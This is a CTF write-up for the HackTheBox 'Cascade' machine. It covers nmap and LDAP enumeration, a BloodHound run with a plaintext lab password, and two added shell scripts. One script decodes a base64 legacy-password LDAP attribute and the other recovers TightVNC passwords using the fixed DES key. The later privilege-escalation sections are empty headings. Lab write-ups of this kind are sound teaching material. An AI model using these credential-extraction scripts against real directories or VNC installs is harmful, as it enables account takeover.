HackTheBox-Cascade

NMAP

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-12-26 11:29:46Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49170/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2021-12-26T11:30:38
|_  start_date: 2021-12-26T11:26:31

PORT 139/445 (SMB)

/opt/windap/windapsearch-linux-amd64 -d cascade.local -m users | grep sAMAccountName | awk -F': ' '{print $2}'

Foothold

ldapsearch -x -LLL -h 10.10.10.182 -D 'cn=USER,ou=users,dc=cascade,dc=local' -b "dc=cascade,dc=local" > ldap_info
cat ldap_info | grep cascade
python3 /opt/Python-Bloodhound/bloodhound.py -d cascade.local -u 'r.thompson' -p 'rY4n5eva' -c all -ns 10.10.10.182
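The grep above works because the interesting attribute carries the domain name, but a plain grep misses two LDIF details of ldapsearch -LLL output: values longer than 76 columns are wrapped onto a continuation line that starts with a space, and values that are not safe ASCII are emitted base64-encoded after "attr::". The script below is an added example, not code from the original writeup. It unwraps the LDIF, pulls one attribute by name, decodes "::" values, and then decodes the custom attribute a second time, since its string value is itself base64. The sample LDIF is constructed, not real output from the box, and the attribute name cascadeLegacyPwd is an assumption (it is what a grep for "cascade" would match).

```shell
#!/bin/sh
# Added example (not from the original writeup): extract one attribute from
# ldapsearch -LLL output. Long values are wrapped at 76 columns with a
# leading-space continuation line, and non-safe-ASCII values are written
# base64-encoded after "attr::"; both break a naive grep.

# Constructed sample in ldapsearch -LLL format, not real output from the box.
# The attribute name cascadeLegacyPwd is assumed.
SAMPLE_LDIF='dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: user
sAMAccountName: r.thompson
memberOf: CN=Remote Management Users,CN=Builtin,DC=cascade,DC=loc
 al
description:: Q29uc3RydWN0ZWQ=
cascadeLegacyPwd: clk0bjVldmE=

dn: CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: user
sAMAccountName: s.smith'

# Join continuation lines so every attribute sits on a single line.
ldif_unwrap() {
    awk '
        /^ /   { printf "%s", substr($0, 2); next }
        NR > 1 { printf "\n" }
               { printf "%s", $0 }
        END    { printf "\n" }
    '
}

# Print every value of attribute $1 from the LDIF on stdin. Values written as
# "attr:: <base64>" are decoded so the caller always sees the raw value.
ldif_attr() {
    ldif_unwrap | awk -v a="$1" '
        index($0, a "::") == 1 { v = substr($0, length(a) + 3); sub(/^ */, "", v); print "b64 " v; next }
        index($0, a ":")  == 1 { v = substr($0, length(a) + 2); sub(/^ */, "", v); print "raw " v; next }
    ' | while read -r kind value; do
        if [ "$kind" = b64 ]; then
            printf '%s' "$value" | base64 -d
            echo
        else
            printf '%s\n' "$value"
        fi
    done
}

# cascadeLegacyPwd is stored as a plain string (single colon), but the string
# itself is base64: decode it once more to get the clear-text password.
decode_legacy_pwd() {
    ldif_attr cascadeLegacyPwd | while read -r v; do
        printf '%s' "$v" | base64 -d
        echo
    done
}

# Against a saved dump: decode_legacy_pwd < ldap_info
printf '%s\n' "$SAMPLE_LDIF" | decode_legacy_pwd
```

Run it against the real dump with `decode_legacy_pwd < ldap_info`; the unwrap step matters for long DNs such as memberOf values, which otherwise come back truncated.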

Privilege Escalation (s.smith)

echo -n 6bcf2a4b6e5aca0f | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv
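The openssl one-liner above is the standard TightVNC password recovery: VNC encrypts the stored password with DES-CBC, a zero IV and a fixed, public key (bytes 23,82,107,6,35,78,88,7), and VNC's DES code reads the key bit-reversed, which is why the command passes e84ad660c4721ae0 rather than 17526b06234e5807. The script below is an added example, not code from the original writeup: it derives the reversed key from the canonical one, replaces xxd with a portable hex-to-bytes loop, and retries with OpenSSL 3's legacy provider, where single DES now lives, if the plain call is rejected. The function and variable names are mine, not VNC's or the page's.

```shell
#!/bin/sh
# Added example (not from the original writeup): recover a TightVNC password
# from its registry "Password" blob. VNC uses DES-CBC with an all-zero IV and
# the fixed key 17526b06234e5807, read with each byte's bits reversed.

VNC_CANONICAL_KEY=17526b06234e5807

# Reverse the bit order of each byte in a hex string (17 -> e8, 52 -> 4a, ...).
bitrev_hex() {
    h="$1"; out=""
    while [ -n "$h" ]; do
        b=$((0x${h%"${h#??}"})); h=${h#??}
        r=0; i=0
        while [ "$i" -lt 8 ]; do
            r=$(( (r << 1) | (b & 1) )); b=$((b >> 1)); i=$((i + 1))
        done
        out=$(printf '%s%02x' "$out" "$r")
    done
    printf '%s' "$out"
}

# Hex string to raw bytes on stdout (portable stand-in for xxd -r -p).
hex2bin() {
    h="$1"
    while [ -n "$h" ]; do
        b=$((0x${h%"${h#??}"})); h=${h#??}
        printf "\\$(printf '%03o' "$b")"
    done
}

# DES-CBC decrypt a hex blob under the VNC key; extra args are passed to openssl.
des_vnc_decrypt() {
    hex="$1"; shift
    hex2bin "$hex" | openssl enc -des-cbc -d -nopad -nosalt \
        -K "$(bitrev_hex "$VNC_CANONICAL_KEY")" -iv 0000000000000000 "$@"
}

# Single DES sits in OpenSSL 3's legacy provider, so retry with it loaded when
# the plain call fails. Passwords shorter than 8 bytes are NUL-padded.
vnc_password() {
    { des_vnc_decrypt "$1" 2>/dev/null ||
      des_vnc_decrypt "$1" -provider legacy -provider default; } | tr -d '\000'
}

vnc_password 6bcf2a4b6e5aca0f; echo
```

The same function applies to any TightVNC/RealVNC-style registry export; only the hex blob changes, the key never does.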

Privilege Escalation (arksvc)

Privilege Escalation (Administrator)


ARZ101

Pentester | CTF Player